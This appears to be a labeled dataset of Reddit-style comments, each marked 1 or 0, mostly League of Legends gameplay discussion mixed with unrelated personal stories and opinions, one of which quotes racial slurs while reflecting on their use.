1	I don't care if you main thresh, I don't care how long you've played, [It is working as intended]( as you can see in this video, you CAN get pulled over a wall.   Also, in one of your previous comments you said that it "gave them the game." So I decided to take a gander at this game's match history.   Blue Side Kills: 11 Red Side Kills: 19   Blue Tower Kills: 1 Red Tower Kills: 2   Blue Dragons: 0 Red Dragons: 1   Red Side Gold Lead: ~5k @16 mins   So already Red side had a really decent gold lead on you. Moreover, they had their  8/0 Lucian  and  3/2 Kog'Maw  in that brush that your team  DOES  have warded. Their team had a 5k gold lead on you, a lot of which is on Lucian.   Next, you claim that you were trying to bait them. Both of their carries are in that brush. Your Akali is in Top lane and Naut is in base. Although Jayce and Cait are nearby waiting for you to "bait" all three of you have substantially less gold and likely items in order for that fight to turn out favorably. You were at about 90% health with about 20% mana. Jayce, as you can see in the clip,  barely had enough mana  to cast his E. And Caitlyn left the moment you got hooked. They out leveled you AND had more mana and health as well as being better prepped for the fight. You had no place/reason to "bait" that fight because you were doomed to lose it from the start.   This is not a game losing play, they way it looks, they won because of good early game start which your team didn't equal. They snowballed and played their lead properly.
1	You totally missed the point. Nothing excuses what they did here and of course they should be punished. I never said his off meta strategy was a problem. But from personal experience many players who do this in normals have a "fuck it" additude where once it doesn't work they want to pretend they weren't really trying anyways. So the next 30 min of the game is just them fucking around while you try to play 4v5. Evidence for this includes a incredibly high cs score as support (without penalising his adc much) with very low kill participation and a high number a towers taken by his team. Leading me to believe his team was ahead but he just afk split pushed (or more likely farmed jungle as yi is inexplicably behind jungle shen in cs), dying repeatily, while his team 4v5'd until fizz/riven were outscaled.   For all we know it could have been that OP didn't get his role so he decided to troll from the start. And we know absolutely nothing about the chat in the game where OP could have been an absolute ass the entire time saying things just as bad as we see here (making the response feel justified even though its not).
0	This will be buried for sure, but I see a lot of these stories are happening in pre-college school. A few things:   1) A lot of these kids are doing this bullying as a cry for help. Granted, it's not an excuse for anyone to beat the living shit out of someone else, but I think it's a little extreme when someone says, "I'm glad he's dead" when they had no chance to learn and grow up to be the good person that they could have been.   2) When you think about the person you are happy is dead, look at their family lives, because that is most likely where they are deriving their aggression from. So many kids I knew in my first 13 years of school (Kindergarten included, I'm not slow) who had severe behavioral issues had family problems and/or broken homes. So when you think about the kid who was bullying you, think about how they were probably being bullied at home at a much larger scale by people who should have been nurturing them. Given their lives, you have it good enough to be bullied by them and not someone who you have spent your entire lives learning from.   3) Maybe some of these kids are just downright evil, and maybe some are better off gone from our lives forever, but I'm willing to bet that the majority are just trying to figure it out just like we were, but didn't have the means to do it peacefully due to their situations outside of school.
1	Not really, they ban you for ruining other peoples games (AKA being toxic) and this guy made it clear that he was doing it to ruin other peoples games.   The problem is that just because you can turn off that feature does not change the fact that it was done with the intent of pissing off everyone in addition to the fact that unlike ignoring someone it is a lot less clear where the solution to that problem would be and if you are annoyed at some asshole spamming emotes odds are you aren't going to be the greatest thinker in regard to finding the solution to it hidden in your settings.
1	He's speaking in theoretically. You admit it is possible, however very unlikely. I think there are too many variables to get an accurate estimation though. We would need the percentage of games that have afks or disconnects, intentional feeders, or trolling teammates (very subjective) and then figure out what percentage of those games were won despite the disadvantage. Somehow you would have to work in the players ranks and likelihood of them carrying with their "main champ" since certain champs can win in varying situations easier than others (for example a Morde in a 4v5). We would also need . . .
0	You act like religion bashing is just rude, unnecessary, and pointless.   1) Many people bash religion to vent about it. Do you realize what it's like to live in the Bible Belt and be an atheist? I'd say that 98% of the people I know are Christians. Fundamentalist Christians. I don't feel like a detailed explanation of every day life and why I might want to vent about that is necessary.   2) Religion isn't harmless. Millions of people in America believe an old book of desert scribblings is the literal word of an all-knowing god, and you expect people to be okay with that? That's just something that deserves respect and tolerance? No. It's disgusting, dangerous, and detrimental to intellectual and societal growth.   So if you don't particularly enjoy bashing religion, no one's going to get onto you about it. But you shouldn't condemn those that do so because they feel like they should, because they feel like religion is a huge problem, and as people who are aware of the damage it's doing and the damage it has potential to do, they feel like they have an obligation to try to fight it.
1	You don't understand how the internet works. There is a tier of ISP's above the consumer ones, your ISP that you pay for sends their data through these networks to get across the country. If there is congestion at a particular hop along the way, you will experience either packet loss, high ping or both. It doesn't matter who your ISP is, Comcast users can experience the same lag as Verizon Fios for example.   To give an example in layman's terms, let's say you and a few other people live in the east coast, all in different states, and you're all driving to California. Midway through the trip you  all  hit traffic somewhere in the midwest, a road you all had to pass through at some point in time. It doesn't matter that you all originated from different areas, you had to converge through this point.   This is the same thing with ISP's, there are multiple paths to travel across the country, which is why you and other customers from different ISP's might get unlucky and hit some lag, while other users of your ISP might have been routed a better path and aren't experiencing problems. If the issue was truly on Riot's end, this post would have significantly more upvotes than a few hundred. The support this thread is getting is from frustrated players who don't understand the situation and want to blame Riot to make it right.
0	Relevantish story time. I was trying to parallel park without power steering (it's since be fixed, thank God) in the pouring rain. I thought I tapped the car in front of me, so I checked, saw no damage, and decided to find another spot. A month later, there's a warrant out for my dad's arrest for hit and run because he owns the car. Turns out a passerby wrote down my info telling the owner of the undamaged car to contact police about it.  After giving cops my information, providing photos of my also undamaged car (no scrapes to indicate any damage had happened), and going to court, I ended up paying $135 in court fees.  They never filed a claim against me, so I'm not sure what the point was.
1	Riot made a few supports' utility spells decay with time. The slow on Janna's Zephyr, for instance, will now last longer (or decay slower) based on how much AP she has. As a result, they nerfed the AP ratios on it. This is also seen in Lulu's Glitterlance/Whimsy, Nami's passive/Tidecaller's Blessing, and in Sona's passive.   You're right, old supports will still be useful (just may not be seen as often, for now at least).   It seems Riot wants to focus more on the utility side of traditional supports, but tuning down some of their AP ratios in other areas (damage wise). They want you to pick a support based on it's utility and not solely on it's damage output. Which is rather contradictory because the support role will now see a large increase in gold throughout the game.   Supports were good at ARAM before 3.14, and that will probably not change. They are still getting tons of passive gold and the new gold items may or may not be that effective. It's like buying philo stone before. Sure, the gold comes in, but it's rather slow because of how gold is distributed passively throughout the game (even without philo).
1	As an old lock screener... DONT. It makes things so much easier if you have it unlocked.  Map awareness, skill placement, heck even just walking is so much easier.   To break yourself of the habit, try keeping your thumb on spacebar with the screen unlocked unless you are moving it somewhere, this will keep it centered on your champ.  eventually you will get used to it, and it will help A TON
1	Just got through gold 3->plat5 after 20 wins and 5 loose.  I can only add another thing. From your point of view, you rely only on jungle in order to climb to plat ? Is it ? It's not bad though it's better to learn some stronk pick for each roles. Like getting 3 char for your main role (Jungle ?), 3 char for your second role (Support ? Since ... It's a nobody play role ... KINDA.) and one for each others.   That's how i worked though i have at least 5 for each. About how did i climb ? I noticed that a lot of people ... prefered to play other things than support. So i learn how to support like a boss and learnt the power of a perfect duo bot. Out of 20 wins. 13 must have been thanks to blitz/sona Support.
0	When I was 18, half a lifetime ago, I was super depressed. My parents divorced when I was young and lived over a 1000 miles apart. One night I feeling really bad and somewhat suicidal and called my parent who lived far away saying that I didn't want to live any more. That freaked them out and they drove the very next day to come save me. I then went to live with them, but I only felt worse. I now had zero friends and I was quickly remembering why I left that parent for the other years before. After 3 months of getting even more depressed I move back to the original parent just after my 19th birthday.   It was a bit different then and some of the shitty friends I had, were gone and I was able to make new friends. A few months after that I joined the Navy and while I don't recommend it, it did change my life. I was a non-combatant (Navy Corpsman) and taking care of the Marines allowed me to do something that was greater than myself. I couldn't fail because I would fail others, others could die if I failed. It worked. After my five year service I used the GI bill to go to college and now I'm about to finish my doctorate in Neuroscience. And I already have a job lined up.   So, what's my point? Just moving isn't going to make things better. Hell it could make things worse. You might get more lonely and more depressed. We all make mistakes and have to live with our past. Moving to another city and changing your name isn't going to erase your memories and the pain and turmoil you feel. What will work is finding direction, creating a 10 year plan (now that is scary as hell, but do it), and stick to it. Maybe you'll change your mind and make a new 10 year plan, but the thing is, get outside of the present and think about your future.   It sounds like you probably have shitty family and friends and not a lot of support. You need to get those people out of your life and make new friends (I know, family you're stuck with). Get involved with things that you like, be it music or volunteering. Do things that make you proud. Make sure that every day is a non-zero day (see /r/NonZeroDay).   Anyways,
0	We must've read different memes.  Mine didn't say anything like "You should return a nice guys niceness and give him blowjobs." Honestly, the concept here isn't too hard to grasp.   IF you want a nice guy (even if it's not the guy who's being nice to you now)   DON'T be a bitch to said nice guy because you think he's just 'trying to get sex'   BECAUSE it makes nice people less nice.
1	this is incorrect, the only AD champs worse than MF are Vlad, Annie, Ryze and Morgana....   All joking aside though, MF is the most disappointing AD carry, regardless of base stats. Cait is great for learning positioning, she's a super safe lane pick and she comes with her own mini wards so if your support is an idiot then you're not left totally naked. Her harass is also terrifying. Everyone will say her lack of an AS steroid makes her weaker in the late game and yeah she doesn't scale as well into minute 50 as many other AD champs, but her monsterous laning presence will generally keep you ahead on farm and therefore items which more than makes up for her short comings.
1	No you shouldn't get banned for ranting on your stream. That's like saying you can't rant about other drivers without being persecuted for insult.   The person that gets called out on stream will most likley never hear it (no they won't even on a 10k stream) and therefore not be offended. If viewers of said stream go on and add the person to insult him, it's not the streamers fault, but the viewers and the viewer should be reported and banned.   If the streamer writes it in chat, then yes, because it is an action that is punishable by the summoners code.   That out of the way: Streamers shouldn't do that. On the other hand this community is incredibly soft and gets offended by the most ridicolous shit. Why? Because no one ever learned to handle this. Smacktalk and Trashtalk are completley different things.   One is: "I'll beat you so hard, you MOMMA won't recognize you."   The other one is: "You are so bad, i will fuck you up so hard your Momma won't recognize you."   If you cannot see a difference in those two statements, you are part of the problem.
0	I never really watched it before until the end of past season. I wasn't crazy about it but it was something to watch. Now I can't wait for each episode that comes out.  The wait for the next episode IS agonizing, but it does keep me regularly tuning into the show, and I guess that's what amc wants from it.
1	Your first point is so key at low elos.   I played a game not too long ago and I was second pick. I have a few champs I can play in every lane, and I'm quite safe and usually go even in whatever lane I play, but I need to know what everyone else is strong at.   Aside from someone saying "ban yasuo" no one in my champ select spoke, even after I said "where does everyone play". I decided to simply pick support (because there are very few support players in silver & so the team can't get "counter-picked").   We lost that game. It was bad from the start, and honestly didn't get much better throughout the game. After the game I decided to check what champions these guys generally play in ranked. Our mid laner, he had never played veigar in a ranked, and he was a support main with 50 games as thresh, 20 games as leona & 10 as both morgana and braum this season - why didn't he say?! I would have happily gone mid for him.
1	So basically why I think ziggs is so strong is his scaling throughout the game as well as his utility. Ziggs has 4 damage spells all with insane range from 850 all the way to 5300. His waveclear is extremely efficient and safe with his Bouncing Bomb (Q) having up to a 1.6 second cooldown with 40% cdr and his Hexplosive Minefield with up to a 6.4 second cooldown with 40% cdr. He provides high burst, high waveclear, and high poke damage with extremely powerful and safe siege. If you look at why Kha'zix and Jayce were nerfed they had insane and SAFE poke damage with no counterplay and strong disengage with their leap and accel gate respectively. With ziggs you can see the same traits in his kit with his poke, waveclear, and clean up with no weaknesses.
1	they announced that 4.20 will be the last patch I am pretty sure. At least that is what Blakinola said in the last
0	Even if 9 out of 10 people from a particular ethnic group are douchebags, you should still give everyone the benefit of the doubt. 1 out of those 10 is still awesome, and they are lumped with those douchebags through no fault of their own.
1	I agree. What I do not understand is why CS is that much more visible. CS is quite a flawed number due to many reasons:   1) Different gold value for different creeps. Toplaner getting small wolves when duojungling, botlane ADC killing enemy Zyra plants or anyone farming pretty well but missing all Cannon minions can mean a lot of gold difference that does not show in CS number.   2) Gold bounty for CS scales with time. Minion gold at around 50 minutes into the game has almost 50% more value than what it has at the beginning of the game.   These differences are only pronounced by global gold. In one of the LCS  games played this week  even casters realized this. One laner was 55 CS behind his counterpart (55:110) however global gold and all those little things mentioned earlier meant that the actual difference was just 400 gold. Which under "normal" circumstances is something like 15-20 CS difference.   Somebody may say that CS may mean level difference. But even this does not apply. Especially toplaners can get levels without CSing by soaking experience in 2v1 situations and then there is dragon experience, large jungle  monsters, exp from kills/assists and exp catchup mechanics. If you want to point to exp difference just compare levles and say this or that guy is this many levels behind.   The only thing CS is good for is when we have straight up lane duels and we are in early to mid game. This is the only time when CS difference show difference in laning skills or general playstyle (e.g. CS heavy farm jungler vs low CS ganking jungler). But we don't have much of those right now.
1	True, but most of their comfort picks started to change a lot, Seraphs Shyvanna was no longer part of the meta, Lee would be banned or taken away from Dexter, Link couldn't be the farm heavy support style mid laner he wanted be to be with more Assassins starting to come into power, DL was never the best Tris or Kog and was better with champs like Vayne (which with her kiting potential, his spilt push adc plan actually works), and with other teams improving their shotcalling while CLG has no real impact full.
1	Lets say you are attempting to do this, when your team picks tryn, tf, trist, and lux.  (this isn't my who's who of bad champs, simply an undesirable comp you may find at that elo)  Would you pick a carry still?  Or try and carry the game in some other manner?  What if someone calls mid?  Can you really carry as a jungler?  What if as you're jungling someone feeds before you even finish the jungle and you go to cover their lane, then another solo dies and you cover their lane, so the other team's jungler takes your shit?
0	That kind of reminds me of the first time I was in the OP's situation as the customer.  I was in some store early in the morning (maybe Home Depot) and I was buying a $2 item and they ask if I want cash back when I pay with my debit card.  This was way before self swipe was a thing.  I said "yeah, sure how much can I get?"  I knew I needed to hit the ATM anyway so I tried to take the max out hoping to avoid another trip.  The cashier obliged but said they didn't have enough in the till and would have to call over a manager.  I told them not to worry about it and I would just make the extra stop.  I've been slightly more conscious of doing that lately but not much.
0	Op here. To respond to the top comment, I'm basically saying that no matter how not racist you are, it seems that there are a lot of people out there who want to just shoot down white people for even trying to be involved in the race debate. Every time I try to talk about it, despite my side, I get a big plate of "You don't know my struggle", or, "You don't know their struggle", even if I'm on their side. So ultimately I just opt out of the conversation all together.
0	Because the ROI [is phenomenal.] (   Median weekly income for a person with no college degree: $652   Median weekly income for a person with a bachelor's: $1,066   So, in a 52 week year, the median college graduate is making $21,528 more than the median high school graduate each year. [You end up making around a million more dollars in your working life than those who don't go to college.](   Of course, some majors will earn more than others, but any college degree is cost-effective in the long run and outearns a person with no degree. Even your average English major.
1	1) Don't get pissy because other people bring up relevant references (martial arts movie is a valid reference), more people WANT Riot to rip stuff off (generally with permission) such as in the case of the ever-requested Bio-Shock Annie, complete with Big daddy Tibbers.   2) Wow. A company that wants money, never seen that before. People need to be paid, and that money has to come from somewhere, just because it works in one area doesn't mean it can work in others (WoW subscription for LoL anyone?). If the only reason you have for them being a "moneywhore" is that they let you buy stuff for real money as well as in game, and that you can buy cosmetics for only real game money, then you really need to rethink your argument...   3) What if I were to tell you that you can also get everything bar skins (unless using SIU) for free in LoL? Yes, it's true. That's what I've done, and even then, you get 400rp free, and that is enough to buy some skins (on special) or even champions! On top of this, in certain countries you can get that card thing to get - wait for it - free RP! (t's and c's apply).   4) What if someone were to tell you that  THEY ARE BASED OFF OF FREAKING MYTHOLOGY, (AS ARE MOST/ALL OF SMITES GODS) AND SO THEY COME FROM SIMILAR SOURCES , if you even bothered to research before raging at the apparent copy pasta, you'd realise that ["The community's been asking for a dragon champion for some time"]( so it's not a sudden thing...   edit: 5)   > [Ao is the family name of the mythological dragon kings](   > [Shin can mean many things, one of which is prosperity. It also means a rising storm](
1	Good list man.  I upvoted, but I'm not sure I agree with your strategy.  I've always found that the best way to learn top lane is to learn a few different characters and spam them all the time.  Once you have them mastered, then maybe go on to more, but it seems most pros have adopted the strategy that you should spam one or two characters as much as possible, and I tend to agree.   Also, here is perhaps a complete list of what I'd consider "common" top lane matchups.  Note it doesn't include AD carries top, which are also a possibility.  Nyjacky has played Trist top.  Dyrus/TRM play Corki top.  Westrice plays Vayne top.  Lots of carries not named Ashe can go top basically :P.  I didn't see them as common though, so I excluded them.     Akali     Cho'gath     Fiora     Fizz (not so much any more, but when I wrote this people played him more top instead of mid).     Galio (see my note on Fizz).     Gangplank     Garen     Irelia     Jarvan     Jax (Though now you mostly see him in the jungle, but he does counterpick some like Fiora).     Kennen     Lee Sin     Malphite     Maokai (usually in the jungle, but it is viable I tell you!)     Mordekaiser (believe he is better mid, but some people run him top).     Morgana     Mundo     Nasus     Nidalee     Olaf     Pantheon     Renekton     Rumble     Shen     Shyvanna     Singed     Sion (mostly goes mid, but can be played top easily  see TRM )     Skarner (mostly goes jungle, but was played top occassionally when this guide was written)     Swain     Talon (again, went top more when this was written.  Now usually used to counterpick mid.)     Teemo     Trundle     Tryndamere     Udyr     Vladamir     Volibear     Warwick     Wukong     Yorick     Riven (Missed her somehow)       As you can see, this yields 720 or so "common" top lane matchups that are possible.  This doesn't even include variables that would affect the matchups like starting items, runes and masteries, jungle pressure, and whether you're on blue or purple side.  Needless to say, learning all of the different matchups would take a while.  It is probably more time-efficient to master one champion (39-40 matchups depending if you count mirror matches) or so.  You'll learn about other champions through you spamming.  Also, finding those rare guides that give you insights into the specific matchups against many characters can help a lot.
1	I used to support all the time. It was fun, exciting, and you could really fudge up with enemy's minds by warding everything. Now, on the other hand, I wand to try out other champions... I slowly started playing Nidalee as AP. Then learned to mid with Annie, and then Veigar. After that, pretty much any champ that comes to my hands can be.. well.. I'm decent in any champ, even if it's my first time playing with him. Same goes for AD, and for Top.
0	A lot of sports also require skill and you have to practice and work to improve your skill: archery, golf, and shooting just to name a few. And sure the Olympic Games isn’t a good example of everyday real life events but a competitive sport is a competitive sport and if you practice and work hard and excel above your competitors you deserve to be rewarded more than your competitors for your hard work and effort.   If you’re not into sports then let’s look at academic competitions. If you want to win a spelling bee you have to study. And when you study and you’re the last one standing you deserve that gold medal. If you’re second or third last person standing you deserve that silver or bronze. Everyone else deserves a “Thanks for participating. Keep studying and next time you might get that top award.”   If you’re not into sports or academia but you’re a hard worker and you work harder than everyone else then a good boss might give you a bonus at the end of the year or at the very least some sort of recognition. Everyone else who “worked to rule” got paid for their job and that’s all they deserve.
0	A few years ago my gf and I were driving down I-5, just pass corvallis cut off and I'm doing 80ish in a 65, mind you its like 1am on a weekday and there is nobody out. I'm in the fast lane because I don't feel like switching lanes every mile or so for the 1 car.   Suddenly this guy flys up on my ass, and flicks his high beams at me, I look up, pull over to the slow lane and he flys past me... $#!*! that was a cop, wtf, ok i'll go 65 for a little bit... 10 minutes pass, f-it back up to 80 in the fast lane... Guy flys up on my ass and high beams me again, pull over and BOOM another cop. WTF again. Do the same thing keep it at 65 for a little and then back up to speed, this happened one more time... I'm seriously freaked out, what the hell could be going on? a few more miles I get behind like 6-8 cop cars traveling in a pack taking up both lanes doing about 55 mph, I'm kinda scratching my head, when the 2 cop cars infront of me slow down and then lock up the brakes stopping I-5 feet infront of me, the ~4 other cops pull a pit type manouver and pull this s-10 over, seems like they ripped the door off and yank this guy out of the car. While 2 SUV cop cars come flying up the shoulders of the road.... WTF is going on, this is straight out of a movie...I sit, it clears up, traffic goes, over the next over pass I see a cop car packing stuff into his trunk(assuming spike strips), and more cops sitting on the on ramps...   I watch the news and newspapers the next few days... not a single word about it. There was easily 12 cops involved, country, state, who knows what else.
1	No.  Simply put, no.   There will always be factors outside of your control.  But people overestimate how much this is--by far.   Let's use the typical analogy of "what would happen if a pro were in your game."  /u/iyfSilencer estimated that "in about 10-20% of all matches you will lose no matter what you do."  Well, the obvious retort is that Faker wouldn't.  He'd win about 99.9% of Silver or Gold matches he played, and he'd probably win 90% of games at low Diamond.  Or something like that.   Obviously, you're not faker, I'm not faker, etc.  But the point here is:  you may think you're doing everything you possibly can, but you're not.  Not even close.   There are  always  things you can do to play a situation better, and you have to keep going with this mindset.   The moment you attribute failure to outside sources, you stop improving.   This is definitely an oversimplification, but you want to err on the side of looking for ways to personally improve rather than blaming others, both in League of Legends and in life.   The key word in this question is "consistently."  No, it is not possible to  consistently  lose because of factors outside of your control.  The reason why playing in lower tiers can be so frustrating is actually simple statistics.  If you're in Silver 1 and you are "good enough" (whatever that means) to play at, say, a Gold 3 level, then you might win about 60% of your games.  That's pretty far above 50%, but it might not feel like it.  It'll take you quite a few games to rank up.  Add to the mix the outside factors that you cannot control--AFKs, weird picks, refusing to ward, trolls, etc--and it can very quickly feel like your quality of play doesn't matter.  But it does.  What you need to do is get  significantly better than where you are now.   Being "good enough" to play at a Gold 3 level isn't going to make it easy to get there.  You need to work on your individual play until you can go toe-to-toe with mid plats; then you might win 70-75% of your games in silver, meaning that it's much easier to get to gold.
0	So I am living with a woman again for the first time (in a few years), and for the most part she is pretty clean. When we first moved in though.. she did the dishes all the time. Now, she doesn't do them at all. I'll do whatever is in the sink while I get ready for work. In the day time when she is at home/school and her boyfriend and myself are at work, she piles dishes in the sink. She has him trained to have the dishes done by the time she gets home from work/school otherwise she gets mad at him.
0	I feel the same way about the physical abuse I went through as a child with my ex stepdad. He was really sadistically power hungry. There was one incident when he gave me 5 minutes to get all the pants on that I could. I got on three pairs of jeans and a snowsuit, then went and got him the back scrubber from the shower, and bent over the couch. The first hit put me on my knees, and I know he hit me at least one more time. Apparently my aunt and grandmother noticed I couldn't really sit comfortably, so they planned for my aunt to "accidentally" walk in on me in the bathroom when I came to her house after school. Instead, she walked in on me changing and pretty much forced me to show her my ass. Not gonna lie, it was pretty much all just black. She started crying and got her now ex husband and they took me to DFACS. There, they made me stand against a wall with my pants down, while a lady took pictures of my ass with my aunt holding a ruler next to it (measuring the bruises). The whole experience was absolutely HUMILIATING. On the bright side, I've always felt a strange sense of safety around my aunt ever since.
1	Depends on the connection you have. Our country's infrastructure sucks absolutely in terms of technology and communication tech. We can barely handle the  very few  high-speed connections that are currently up, not to mention if half of the country had land-line connections (something like 25% of the country have DSL connections).   I'm running on a 2046/512 connection with 175-190 ping on EUW and 250-300 on NA. Haven't bothered with EUNE, because of the language barrier, and even EUW has that problem. You can play with 140-150 ping with a 10mb/4mb line, but those cost just way too much, and the speeds are almost never near what they should be.
1	Using this thread to say something general about the rework:   For me it feels like his new W doesn't synergize well with the intended bruiser playstyle. There is no incentive for him to stay in melee range because his AAs do no damage, except for the 1 W proc.  His new W makes him more burst oriented than the old AD steroid, however glass cannon build doesn't work with the new ratios anymore.
0	I had a similar situation once. A bunch of guys sat down next to me on the bus and they seemed sort of intimidating because of the way they acted and spoke, but I didn't want to move because they were literally in the middle of a conversation about white girls treating black guys like criminals. I was about fourteen at the time, and I thought to myself, "Well, I'm not going to just randomly move now, that will only prove their point, even if they are being rude, drunk, and belligerent."   Bus ride goes by, they say some rude things to my friends and I, which we just ignore because, being young and already nervous, we feel like we're already trapped. Finally, one of the guys leans over, rips my headband off my head and throws it out the window. I turn around and notice that their all staring at me a little too creepily now and laughing, so I grab my friends and we get off at the next stop. They get off in front of me and just as I'm about to go, one of the guys grabs my arm to hold me there and proceeds to spit on me while one of the others guys slaps my ass, and then pushes me away, calling "Dumb white bitch," as I hurry off the bus.   It was a matter of ass holes being ass holes, no matter what the race. I should have just stuck with my gut instinct and moved right away.
1	He says spike synonymously with burst because he used to play Guild Wars (Jatt Kittenstomper) at a very high level and "spikes" were essentially focus-fire from an entire team (or portion of a team known as a split).   Anyway,
0	My point is though that it is not as bad as many say because it doesn't build up as CH4, it builds up as CO2, which has 4% if the potential of methane.  There are a lot of other sources (that produce far more CO2) that you are completely ignoring.   EDIT:
1	When someone makes a nigger joke, and we call them a racist, there is nothing questionable about that. When someone makes a rape joke, and we call them out for being indecent, there is no question about that. When the person who tells the joke himself more often than not admits to such jokes being in poor taste, there's no questions about that.   Exactly. I'll admit that I do occasionally use the word 'nigger' as a bit of a joke. I'll admit that it is a racist term and I may be racist for using it.   However, I use it around friends that I know and are aware that they will not be offended, I wouldn't dare use it in a public setting.   Not in fear of getting an ass beating or anything but because when one is in public they have the right to be comfortable within the bounds of reason. [EG: I'll not use offensive words [nigger, rape, chink, etc] But I will be comfortable in my gender identity and sexuality, Whichever one I am comfortable with identifying as at that moment and I won't restrict myself because someone may be offended by that because those things are a part of me that I value enough to be unwilling to restrict myself in that regard. [I won't go around and flaunt it, If I'm feeling like a woman that day and am expressing myself as such, I won't go around stating that I have a penis. That's too much information and I don't believe anyone would want to hear about someone talking about their genitals anyway :P]   Offensive humor is not a part of me that I value greatly, I'll gladly omit from using it so I don't make anyone feel uncomfortable.   Which makes me wonder, Should I not use words like that at all, even around friends?   Are we not suppose to question your uses of shithumor?   I know you're not speaking to me but if I were told that it is offensive, even in the company of friends that wouldn't find it as such and I had been told so in a logical, non-patronizing manner [EG: Yes, It is racist to continue to use those words in that context, Yes you are at least slightly racist.]   I'll happily stop doing it.
1	I find it pretty amusing that people outside of the team are declaring what TSM needs as if they have a true clue of what goes on with their favorite team. Sure, they make visible mistakes in the game but you don't know what their thought process is going through picks and bans, scrim/practice and research/theory craft regiment. This is their life and job, I'm sure they're trying their hardest and don't purposely try to lose. I'm not even a TSM fan (infact, I usually root against them TBH) but you guys need to chill out.
0	Dude whenever anyone ever makes a post that against the liberal agenda they usually get downvoted to hell. I just posted something recently explaining that if Fox News is biased then so is MSNBC. Of course the Reddit Liberal Army came after me.
0	The unfortunate fact of the matter is that being a teacher is a highly desirable job, which is why they are payed so little. It's simple economics: The supply is way bigger than the demand, so the cost goes down.   The military, on the other hand, does not have gobs of recruits looking for a few openings. So recruits are actively sought after, and they do not even have the benefit (many times) of increased wages due to a high-demand position. Throw in the fact that they're constantly at risk of death, and I simply don't see how you can't be thankful. Even if they were idiots in high school, that doesn't make the risk any less possible. Personally, it's the huge risk for (arguably) our nation's benifit that makes me respect and support them. Which is why I support and respect firefighters and police officers just as much.   Also, many teachers in low income areas are paid waaay more than the ones in suburbia, at least in my state.
1	Hello everyone,   I've been an avid LoL player for the past 2 years, and an avid fantasy hockey player for much longer than that.  When Riot first came out with the news about LCS, I was super stoked about it - and after watching the first 2 week's worth of games, I was hooked.  One night after watching a hockey game on TV and checking my fantasy league, I immediately thought of how cool it would be to have a fantasy sports team for the LCS players.  I hopped online and checked it out - at the time, there was only one site up, but to me it wasn't a "true" fantasy sports site, like hockey or football.  After waiting a while and getting tired of not seeing any updates regarding the topic...I decided to start my own project.   I teamed up with my cousin (software engineer) and after months of hard work, I present to you Draft Demacia - A LoL Fantasy Sports Site.  A quick list of the features can be seen on the coming soon page.  I'm super excited about this and I feel it will bring fans closer to the LCS series that we watch.   See you in the Live Draft where I'll be first picking TheOddOne #TSM #BAYLIFE
1	If this is your first time playing MOBAs or video games then bronze isn't too bad. There's a lot to learn (from reactions to events or even what items to buy) and it's hard for you to pick out what's right and wrong in game. Sometimes an incorrect decision appears to be right because the opponent made a mistake too. Most of what I've learnt comes from streams on youtube (Itzhao for Top, Scarra for Mid, Foxdrop for Jungle and Phy for ADC) and I personally feel they've helped me up my game from Silver 4 (start of summer) to Gold 5 (where I'm at now).   Also, a good attitude helps loads! Be willing to learn after every game, even if you did amazing. Think of how you can improve! Don't get into arguments. There's no point arguing on LoL because people rarely listen anyways. Just play YOUR game and don't let anyone else affect you. Learn the meta!
0	There is nothing "wrong" with your choice. The oijnt I made was that she was in the same boat as you. She never wanted to date somebody with kids. She didn't tell me that, becsusrcshe never thought I had one. So by the time I told her I did, she had fallen for me, she loved me, not the superficial onkibd dating world crap.  After that point,,me having a kid wasn't as important as she thought it was st the beginjng.
1	Started happening to me too.  Searched the sub-reddit and found something from a while ago.  Tried to reinstall (because that is what it said) and it went horribly.   I kept getting the old launcher and it would never update properly.  So I uninstalled, downloaded a fresh new copy (took about 30 minutes), installed it, and it works like a charm.   Before I tried all this, I of course opened as much of whatever firewalls I had, which did absolutely nothing for me.
1	I can't say I've tried Nautilus support, but I have played against it a number of times. From a squishy support's perspective, Nautilus is pretty scary. His base damage is really good, and he has CC up to ying-yang. I actually found myself more scared of Nautilus' damage than of the AD's (in the laning phase, that is.)   Also, his most important tanking ability, his shield, stacks on a stat you should be building a lot of as a support: bonus health. One of the major differences with jungle Nautilus is that you don't get to build a lot of items though, so your tanking capabilities are less than if you were jungling. However, he is still quite tough to take down for a support, and his early game damage is straight up scary.   There are a few "downsides" I have found.     His Q seems to have a larger hitbox than Blitzcrank's (someone correct me on this if I'm wrong), so it's harder to fire those precision skillshots past or even between minions, and hit. Also, while it's an excellent gapcloser, it doesn't displace the enemy champion as much as Blitzcrank's. In some situations, this can be a difference of life or death both for yourself and for your target.     He brings the exact same utility to the team, including way more tankiness, if he jungles. Also, his kit is awesome for ganking, so you could call it "a waste" to spend all that potential on just one lane. Roaming is of course an option, but it's a very risky one unless you're significantly ahead, and your AD can 1v2 quite easily.
1	If you look at the Meta's of the NA Servers, and the Korean Servers you'll notice that they're drastically different.  I remember an old post saying that Korean Players don't really care if they get hooked by a Blitzcrank or a Thresh, simply because they want to be pulled/hooked; they understand that in certain situations, it's better to be pulled/hooked and so they don't have to engage on them, the enemy can engage for them.
1	Hi, I posted some advice about Assassin's in the summoner school, thought I would post it here, to see if you guys like it.   Oh^and^to^check^if^its^correct.   Here it is.   Okay, assassin's are my main's so I'll try to help you out.   (Sadly Kha is the only Assassin I don't play. So, sorry bout that)     You're goal is to kill their adc or apc (whoever is the most fed). You jump in and kill them, and you kill them fast, and you kill them dead. If you die doing that, then it is probably worth it.        You have to be smart. For example, don't jump onto their Vayne when their leona is just standing there. You're going to get stunlocked and die. Wait until Leona/whatever-other-support has used their cc before jumping in. You should also try to make sure that the adc's themselves blow their peel too, but sometimes you can kill them before they can stop you,     i.e A Talon killing Vayne before the silence wears off, so she can't peel for herself,.     If you really want to carry, pick Kha'Zix, Katarina, Diana or Akali. Why? Resets. It lets you be do than making the fight a 4 v 4. Akali's ult reset lets you kill both carries extraordinarily quickly, same with Kha'Zix's E, and Diana's ult. (Katarina just munts your entire team, so thats cool too.)       Most assassins have 1 or 2 of the following.     -Their main nuke has a short cooldown, (Akali, Fizz, Kha)   -They have Resets (Akali, Kat, Kha)   -They have some aoe damage outside of their single target damage (Talon, Kat, Diana)   This prevents them from being completely useless for extended periods of time.     A quick word about the two oddball assassins.     LeBlanc   Why is she an oddball? Because she is the epitome of the assassin philosophy. Pick one target, and destroy them. Most assassin's have something else, she does not. She makes up for it with her famous lane dominance, (which IMHO was actually buffed a LOT by her 3.9 rework). Stay away from her until you've learned a few other assassin's.  She's hard mechanically, she's hard Game knowledge-wise, she is one of the squishiest champions in the game, and she is ALL high CD single target damage, (inb4 some mentions double w). She all fall's behind completely or gets ahead 